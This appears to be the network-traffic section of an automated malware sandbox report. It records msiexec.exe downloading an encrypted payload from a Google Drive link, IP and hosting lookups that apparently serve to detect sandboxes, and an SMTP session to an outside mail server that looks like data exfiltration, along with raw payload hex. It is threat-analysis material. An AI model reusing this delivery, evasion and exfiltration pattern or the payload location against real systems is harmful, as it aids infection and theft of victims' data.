Nov 5, 2024 16:36:55.769738913 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.769776106 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769779921 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.769834042 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769853115 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.769897938 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.769901037 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769906998 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.769954920 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769984961 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.769989967 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.770021915 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.770754099 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.770802975 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.770822048 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.770855904 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.770869017 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.770912886 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.770915985 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.770948887 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.770966053 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.770970106 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.770991087 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.771003962 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.771014929 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.771065950 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.771740913 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.771821022 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.771821976 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.771828890 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.771856070 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.771907091 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.771912098 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.771950006 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.772177935 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.772216082 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.772219896 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.772272110 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.793637037 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:55.793705940 CET	443	49711	216.58.206.65	192.168.2.8
Nov 5, 2024 16:36:55.793800116 CET	49711	443	192.168.2.8	216.58.206.65
Nov 5, 2024 16:36:56.692260981 CET	49712	443	192.168.2.8	104.26.13.205
Nov 5, 2024 16:36:56.692301989 CET	443	49712	104.26.13.205	192.168.2.8
Nov 5, 2024 16:36:56.692370892 CET	49712	443	192.168.2.8	104.26.13.205
Nov 5, 2024 16:36:56.693974972 CET	49712	443	192.168.2.8	104.26.13.205
Nov 5, 2024 16:36:56.693994999 CET	443	49712	104.26.13.205	192.168.2.8
Nov 5, 2024 16:36:57.546708107 CET	443	49712	104.26.13.205	192.168.2.8
Nov 5, 2024 16:36:57.546789885 CET	49712	443	192.168.2.8	104.26.13.205
Nov 5, 2024 16:36:57.549020052 CET	49712	443	192.168.2.8	104.26.13.205
Nov 5, 2024 16:36:57.549026966 CET	443	49712	104.26.13.205	192.168.2.8
Nov 5, 2024 16:36:57.549433947 CET	443	49712	104.26.13.205	192.168.2.8
Nov 5, 2024 16:36:57.552962065 CET	49712	443	192.168.2.8	104.26.13.205
Nov 5, 2024 16:36:57.595335960 CET	443	49712	104.26.13.205	192.168.2.8
Nov 5, 2024 16:36:57.733839035 CET	443	49712	104.26.13.205	192.168.2.8
Nov 5, 2024 16:36:57.733901978 CET	443	49712	104.26.13.205	192.168.2.8
Nov 5, 2024 16:36:57.733941078 CET	49712	443	192.168.2.8	104.26.13.205
Nov 5, 2024 16:36:57.737288952 CET	49712	443	192.168.2.8	104.26.13.205
Nov 5, 2024 16:36:57.749444962 CET	49713	80	192.168.2.8	208.95.112.1
Nov 5, 2024 16:36:57.754482031 CET	80	49713	208.95.112.1	192.168.2.8
Nov 5, 2024 16:36:57.754571915 CET	49713	80	192.168.2.8	208.95.112.1
Nov 5, 2024 16:36:57.754751921 CET	49713	80	192.168.2.8	208.95.112.1
Nov 5, 2024 16:36:57.759722948 CET	80	49713	208.95.112.1	192.168.2.8
Nov 5, 2024 16:36:58.348784924 CET	80	49713	208.95.112.1	192.168.2.8
Nov 5, 2024 16:36:58.403695107 CET	49713	80	192.168.2.8	208.95.112.1
Nov 5, 2024 16:36:59.951872110 CET	49713	80	192.168.2.8	208.95.112.1
Nov 5, 2024 16:36:59.957284927 CET	80	49713	208.95.112.1	192.168.2.8
Nov 5, 2024 16:36:59.957425117 CET	49713	80	192.168.2.8	208.95.112.1
Nov 5, 2024 16:37:00.413008928 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:00.417989969 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:00.418111086 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:00.994605064 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:00.995031118 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.000015974 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.151644945 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.155535936 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.160645962 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.315074921 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.315474033 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.320426941 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.477303028 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.479490995 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.484277964 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.637973070 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.638397932 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.645250082 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.820481062 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.820625067 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.825685978 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.979985952 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.980690956 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.980690956 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.980690956 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.980690956 CET	49714	587	192.168.2.8	208.91.199.223
Nov 5, 2024 16:37:01.985634089 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.985645056 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.985971928 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:01.985980988 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:02.274764061 CET	587	49714	208.91.199.223	192.168.2.8
Nov 5, 2024 16:37:02.325617075 CET	49714	587	192.168.2.8	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 16:36:49.783725977 CET	52148	53	192.168.2.8	1.1.1.1
Nov 5, 2024 16:36:49.979630947 CET	53	52148	1.1.1.1	192.168.2.8
Nov 5, 2024 16:36:51.363262892 CET	62634	53	192.168.2.8	1.1.1.1
Nov 5, 2024 16:36:51.369998932 CET	53	62634	1.1.1.1	192.168.2.8
Nov 5, 2024 16:36:56.673342943 CET	53744	53	192.168.2.8	1.1.1.1
Nov 5, 2024 16:36:56.680632114 CET	53	53744	1.1.1.1	192.168.2.8
Nov 5, 2024 16:36:57.740799904 CET	50605	53	192.168.2.8	1.1.1.1
Nov 5, 2024 16:36:57.748543024 CET	53	50605	1.1.1.1	192.168.2.8
Nov 5, 2024 16:36:59.952881098 CET	62497	53	192.168.2.8	1.1.1.1
Nov 5, 2024 16:37:00.411468983 CET	53	62497	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 16:36:49.783725977 CET	192.168.2.8	1.1.1.1	0x48ba	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:51.363262892 CET	192.168.2.8	1.1.1.1	0x9a76	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:56.673342943 CET	192.168.2.8	1.1.1.1	0x603b	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:57.740799904 CET	192.168.2.8	1.1.1.1	0x3bd4	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:59.952881098 CET	192.168.2.8	1.1.1.1	0x226c	Standard query (0)	smtp.santonswitchgears.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 16:36:49.979630947 CET	1.1.1.1	192.168.2.8	0x48ba	No error (0)	drive.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:51.369998932 CET	1.1.1.1	192.168.2.8	0x9a76	No error (0)	drive.usercontent.google.com		216.58.206.65	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:56.680632114 CET	1.1.1.1	192.168.2.8	0x603b	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:56.680632114 CET	1.1.1.1	192.168.2.8	0x603b	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:56.680632114 CET	1.1.1.1	192.168.2.8	0x603b	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:36:57.748543024 CET	1.1.1.1	192.168.2.8	0x3bd4	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:37:00.411468983 CET	1.1.1.1	192.168.2.8	0x226c	No error (0)	smtp.santonswitchgears.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 16:37:00.411468983 CET	1.1.1.1	192.168.2.8	0x226c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:37:00.411468983 CET	1.1.1.1	192.168.2.8	0x226c	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:37:00.411468983 CET	1.1.1.1	192.168.2.8	0x226c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Nov 5, 2024 16:37:00.411468983 CET	1.1.1.1	192.168.2.8	0x226c	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

api.ipify.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49713	208.95.112.1	80	7048	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 16:36:57.754751921 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 5, 2024 16:36:58.348784924 CET	174	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 15:36:58 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49710	142.250.185.238	443	7048	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 15:36:50 UTC	208	OUT	GET /uc?export=download&id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo HTTP/1.1 User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-05 15:36:51 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 05 Nov 2024 15:36:51 GMT Location: https://drive.usercontent.google.com/download?id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-fcOa7KbtVZTX5ClyjGAXeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49711	216.58.206.65	443	7048	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 15:36:52 UTC	250	OUT	GET /download?id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo&export=download HTTP/1.1 User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-05 15:36:55 UTC	4920	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="BMfiTNbHYgkF10.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 246336 Last-Modified: Wed, 16 Oct 2024 13:31:36 GMT X-GUploader-UploadID: AHmUCY1NRU9nrN_n3Y7PHy6ZzZzCPpQRhWNoNHDFNBfBTE7eOwhOC4slbeR37k9bwE5m0FgCT_2CMmxSPg Date: Tue, 05 Nov 2024 15:36:55 GMT Expires: Tue, 05 Nov 2024 15:36:55 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=CEKWyw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-05 15:36:55 UTC	4920	IN	Data Raw: 3e d1 13 0c 6b 92 43 1c b4 22 85 32 4b ce d3 ca b7 8e 59 9f 9a 3b 10 b7 fb c9 01 fa e0 e2 a7 94 93 09 05 a0 6e 57 ba f4 2e c9 f9 db 89 25 dd 41 b0 06 e7 5b 6c 7a c9 90 ef 8b 72 53 eb 7b b4 91 f9 84 53 9e 08 7a 1d b7 21 08 49 5f 93 a1 c8 59 ac 94 ea cb ef eb 7c 70 26 3b d6 f7 e6 5e 1e cd c5 54 86 7a c1 e3 a0 cd 16 48 84 b9 ab af 39 52 01 f5 94 57 c0 87 8c 41 94 b2 26 b4 e9 fe 0b 43 32 2d 82 d8 89 eb 38 75 6d 4e fc cc 9a ea ef 00 28 04 8d 41 af 5c a0 95 12 3f 89 9b ad 3b 05 41 b5 fc e7 4e b0 0c bd ae 28 f6 50 7b ce 94 d4 dd 26 34 53 7d 8a 72 5f 0d b8 42 d1 1b e6 a0 af 8e b3 68 c9 db f2 17 3d ad 1c e1 3e f1 3c 5b c8 86 dd 8d ee 41 4b 20 fe 4b 31 37 26 50 31 86 8e 93 d3 4a e8 76 33 64 3e 4c 32 99 c0 f7 54 26 5f 08 1a 8b 7f a2 63 52 c5 4d 8b 13 d1 34 14 aa 50 Data Ascii: >kC"2KY;nW.%A[lzrS{Sz!I_Y\|p&;^TzH9RWA&C2-8umN(A\?;AN(P{&4S}r_Bh=><[AK K17&P1Jv3d>L2T&_cRM4P
2024-11-05 15:36:55 UTC	4854	IN	Data Raw: 3b b9 d5 28 f4 e0 e9 e9 44 df ee 06 76 7f 5d 99 37 85 90 9f a9 c1 7e 3f 54 0a 1b 6e 71 49 fc 36 03 51 fb 51 63 36 24 2b 18 a0 db 9d 43 86 55 06 1e bc da 43 d1 58 1c ac d9 83 78 ac 5c a8 24 25 ab ec 25 c3 fd e5 b7 31 7f 34 f7 7d 76 43 f3 95 b3 f2 24 ea d6 d9 55 83 a4 8a 2b 97 0a f3 97 66 3d ee 7c 6a 6f fd a3 54 05 27 d3 53 1f 68 4d 77 b6 a4 fa 69 e3 70 00 cc aa 0c 2a 32 53 8b 2a 89 c9 8a e4 db 31 32 6a 66 14 2e a2 56 66 ee 69 a4 d2 7c df d6 5c 8a 84 1d 2a 34 dd d5 91 85 93 ef 2d 86 06 79 e1 ab 0a 0e 55 b4 c0 e7 47 0d f8 1e 82 c9 b1 7a 7b 4f ca 32 b9 86 ec cd d2 99 15 60 11 f6 09 41 f1 27 29 8e 77 59 9f f0 61 3b d6 6f 70 6e 25 a0 02 82 75 d6 e1 e2 a3 24 ac 69 06 d4 9d ae d1 62 73 99 db 2b 86 2b 8e 9d ef 68 d2 8b 83 e7 f1 b4 5e 50 41 5f 62 a0 3b 36 d0 ba a7 Data Ascii: ;(Dv]7~?TnqI6QQc6$+CUCXx\$%%14}vC$U+f=\|joT'ShMwip2S12jf.Vfi\|\*4-yUGz{O2`A')wYa;opn%u$ibs++h^PA_b;6
2024-11-05 15:36:55 UTC	1328	IN	Data Raw: 3d aa 97 08 28 93 5c dd 60 8d e7 d6 2b a6 42 f3 a9 ee 96 d7 4c 81 e5 f1 9c 6f ca 44 59 10 95 21 36 a0 92 4f b6 20 4a cd 92 88 16 a5 6c b2 94 ac be e6 2e dd 6c 3e 00 e2 f7 e5 5e 4a 70 fd 47 fd f9 62 32 83 a5 4c be e9 c1 98 d8 eb f7 e8 e7 d2 2c ea e5 2c eb 71 1e 64 b1 64 87 15 a9 58 c8 c4 3f 42 73 5d b4 b2 57 a0 9f 83 dc d3 cb 07 7a ab c1 6b d0 ee 75 4d 11 9f 3d 5f e6 2e 5e 01 4f 07 f6 c7 07 46 6c ab 8d 4e 8f 20 94 77 55 ca e0 46 05 f8 fe 49 11 a0 43 41 e1 6b b8 3c 08 24 2e bc ef 13 a0 b3 01 85 7c 20 f3 43 d6 cd 33 1b da 5f 96 66 7a 24 5c 5f b0 da 69 4e 58 7e 1e dd 25 49 bb 05 9c d4 8c b3 3a 3b 92 c1 ba 4e 50 e9 e4 9d ed 4e b6 9a 7f 08 be a6 d4 81 4e dc 2a 2e c9 a5 0a 7f 1b e5 9b ed b5 d2 10 06 05 e8 a5 1b 7c 01 45 aa a7 f0 98 76 de 00 42 29 95 4b 96 bc 03 Data Ascii: =(\`+BLoDY!6O Jl.l>^JpGb2L,,qddX?Bs]WzkuM=_.^OFlN wUFICAk<$.\| C3_fz$\_iNX~%I:;NPNN*.\|EvB)K
2024-11-05 15:36:55 UTC	1378	IN	Data Raw: e3 22 f4 e0 17 1b 4f df c6 54 88 73 57 67 19 87 90 bf a3 3f 7f 06 a4 04 17 6e 59 ba f0 3a 05 51 e3 51 63 36 24 24 21 87 db 63 4f 78 58 20 1e c7 99 43 2f 5d 05 a7 d9 83 78 f5 5c a8 24 25 ab 4a a6 85 fd e5 48 c3 71 33 d7 51 6a 43 f3 6b 4c c5 2d ea d6 27 61 8a a4 aa 2b af 58 0d 96 98 2e e4 7c 6a 7c cd 85 55 56 26 d3 ad 13 64 4d 66 68 a8 f6 69 c3 aa 0e c8 aa ca 14 0a 56 8b 2a 77 fd 8b e4 fb 32 0a 6a 9c 15 d0 65 4b 66 ee 43 5a cd 4d dd 28 00 8a 84 3d 2f 34 dd c4 4f 8b 97 ef 2d 86 04 7d e1 b3 3a 0e 55 b4 3e 18 72 1f f8 3e 82 ba a4 7a 85 44 0d 36 b8 86 cc cf f2 98 15 9e 1f 0c 07 41 0f 2b d3 82 57 5b bf f1 61 c5 d7 a8 f0 57 20 a0 fc 8e 4c d3 92 f9 a1 1c 60 68 f7 29 b5 77 dd 60 75 85 24 22 86 5b 99 57 ec 42 d6 75 94 d5 f3 9c 3b 50 41 59 18 b5 3b 27 80 92 b1 b8 2c Data Ascii: "OTsWg?nY:QQc6$$!cOxX C/]x\$%JHq3QjCkL-'a+X.\|j\|UV&dMfhiV*w2jeKfCZM(=/4O-}:U>r>zD6A+W[aW L`h)w`u$"[WBu;PAY;',
2024-11-05 15:36:55 UTC	1378	IN	Data Raw: b4 b0 26 b4 69 00 05 47 3c 32 c6 da 8d 5f 11 b8 4c f6 fd 7e 56 f2 b1 68 41 77 ad 11 dc 33 c7 e7 8d 5c ad f8 cc ab 67 2a c1 fc 87 2b 90 7e 36 c1 31 9a 3e 5b 8a e3 82 fd 4b 5b 0f 57 5b 80 ad f9 90 43 d1 31 e7 b0 af 8e e3 2d d6 db eb 62 3e ab 3a cd 0e 96 2f 6b cb 86 e9 8f ee 41 a7 20 fc 5b 1a 36 2d 50 31 c0 83 97 d3 7a 16 77 33 64 3e b2 70 4b c3 d7 5c 06 5f 08 e4 6a 45 b0 63 52 85 6d 8b 33 d1 34 ea a6 51 c9 48 39 9c ff bd 93 1d fc f0 6d 46 19 1e cb a0 97 3b 1f c4 d7 58 24 d8 fa b3 61 27 c5 25 3b 99 f4 22 f4 e0 9b 91 4e df 9e a4 a8 77 5d 99 17 79 9e 9b a9 3f 81 0a 5e 0a 3b 65 59 44 fc c8 04 48 ef 51 63 36 24 28 1b a0 f3 3d 4f 86 5f 1f 86 bd da 43 0f 55 25 a6 d9 7d 76 a8 7c a9 da 29 af 12 0b ca fd e5 49 c3 7e 0d d9 71 76 43 cb ec b3 cb 21 ca dc d9 6d 86 5a 84 Data Ascii: &iG<2_L~VhAw3\g*+~61>[K[W[C1-b>:/kA [6-P1zw3d>pK\_jEcRm34QH9mF;X$a'%;"Nw]y?^;eYDHQc6$(=O_CU%}v\|)I~qvC!mZ
2024-11-05 15:36:55 UTC	1378	IN	Data Raw: 48 48 54 dd 5b 36 68 65 66 06 b6 a1 5c 7d 5a 19 83 9d 79 91 16 cb cb 64 2d f9 e5 76 28 58 a6 5a 5f a3 dd 1c cc 40 68 6f 82 94 0a 29 6e 47 be 62 3e 98 68 41 6b 48 4a 32 08 2e 09 b4 21 5c 12 2d 05 e0 e0 10 db 1d 81 53 b9 1d 7d 3e de d7 3c 61 5a d6 78 7d b2 2d e7 a1 63 7b 49 bf bb 75 fa 65 77 8c 4c 9e 0a c4 0e 2c aa 93 3d 34 a7 8a 75 94 da c3 9e 0b 84 13 b4 25 08 b7 53 6f 5e e8 5d 14 94 ea 35 ee d2 5f 70 66 3b 28 fe e6 5e 62 ae c5 54 82 84 cd e1 a0 33 1a 49 84 91 a9 af 39 79 ff fb 94 57 e0 82 8c 41 94 4c 28 b7 69 fe f5 4f 3f 32 18 d4 89 5f 31 46 4d cf ec 80 57 cb 45 64 41 77 53 3f dc 33 e7 e4 73 52 a9 06 c2 56 6b 2e 3f d0 86 2b b0 7b c8 c0 08 61 3f 62 9c db 87 fd b5 57 37 18 5a 73 53 07 dc 93 2e e4 19 80 a9 8e e3 2d 37 d5 bd 16 3e 53 37 ce 0e b7 3d 5b c8 86 Data Ascii: HHT[6hef\}Zyd-v(XZ_@ho)nGb>hAkHJ2.!\-S}><aZx}-c{IuewL,=4u%So^]5_pf;(^bT3I9yWAL(iO?2_1FMWEdAwS?3sRVk.?+{a?bW7ZsS.-7>S7=[
2024-11-05 15:36:55 UTC	1378	IN	Data Raw: ce 49 5f d2 3c 49 3c 0b 9a da 2a e1 98 03 7b 6c 1d a4 30 64 06 c7 66 6c a1 71 0c cf ce 8c 49 e4 99 0b f2 bf 0e 6d 66 f2 00 a9 dc 47 bc c3 32 ce 7d 40 fc 7c 5a 65 9a b4 76 01 e6 90 a7 db 1d c4 2a 61 32 b3 d3 34 3a 33 40 fa a0 1a 6d ea e7 e8 b1 7c c8 25 9c 8c 9c 4c 26 71 d1 68 9f ff 7f d0 48 78 8c 5d 6d 75 fd 57 01 fa 87 4a 79 9c e8 d3 94 53 f3 a7 1c c7 f9 22 ea 25 c2 f0 be f2 84 22 8a 26 20 e5 18 35 dd d9 3f 3a ab 57 25 7b df 06 54 81 7f 83 a0 34 f7 f0 c0 66 2f 84 87 8b 6e 7e 4e 2d 5d d2 a3 04 81 46 49 4b fd 50 36 40 64 98 08 f2 a0 5c 83 45 1a 83 bd 72 91 16 cb 37 65 14 d9 92 77 28 a6 d8 5a 5f d8 57 1d cc 44 85 62 83 94 71 4e 6e 47 a9 3d 78 98 71 46 4b 44 44 32 08 c1 27 b7 21 5c ec df 08 e3 c0 20 de 1c 81 ad b8 da 7f 3d de f7 07 cf 5a d6 86 5c 82 32 e7 a1 Data Ascii: I_<I<{l0dflqImfG2}@\|Zeva24:3@m\|%L&qhHx]muWJyS"%"& 5?:W%{T4f/n~N-]FIKP6@d\Er7ew(Z_WDbqNnG=xqFKDD2'!\ =Z\2
